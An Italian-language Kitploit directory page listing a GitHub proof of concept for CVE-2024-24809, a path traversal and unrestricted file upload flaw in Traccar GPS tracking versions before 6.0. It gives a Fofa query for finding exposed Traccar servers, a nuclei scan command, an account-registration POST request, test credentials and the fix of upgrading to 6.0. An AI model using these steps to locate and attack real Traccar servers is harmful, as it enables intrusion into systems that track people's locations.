Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24809-Proof-of-concept — Gravi vulnerabilità nel sistema GPS Traccar espongono gli utenti ad attacchi remoti | Kitploit
Strumenti/GitHubGitHub/gh-ost00/cve-2024-24809-proof-of-concept
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPhishingPenetration Testing
GitHubgh-ost00/cve-2024-24809-proof-of-concept

CVE-2024-24809-Proof-of-concept

Gravi vulnerabilità nel sistema GPS Traccar espongono gli utenti ad attacchi remoti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
51 anno faNon ancora revisionato

Dettaglio CVE-2024-24809

#Descrizione Traccar è un sistema di localizzazione GPS open source. Le versioni precedenti alla 6.0 sono vulnerabili a path traversal e upload senza restrizioni di file con tipo pericoloso. Poiché il sistema consente la registrazione per impostazione predefinita, gli aggressori possono ottenere permessi di utente ordinario registrando un account e sfruttare questa vulnerabilità per caricare file con il prefisso device. in qualsiasi cartella. Gli aggressori possono utilizzare questa vulnerabilità per phishing, attacchi di cross-site scripting e potenzialmente eseguire comandi arbitrari sul server. La versione 6.0 contiene una patch per il problema.

#utilizzo

root@kitploit:~
Fofa query : app="traccar"
root@kitploit:~
nuclei --target {target.com} -t CVE-2024-24809.yaml

#Proof of concept (usando burpsuite)

root@kitploit:~
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8

{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}

#Account di test

root@kitploit:~
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"

Come risolvere?

Aggiornare org.traccar:traccar alla versione 6.0 o superiore.

Scarica lo strumento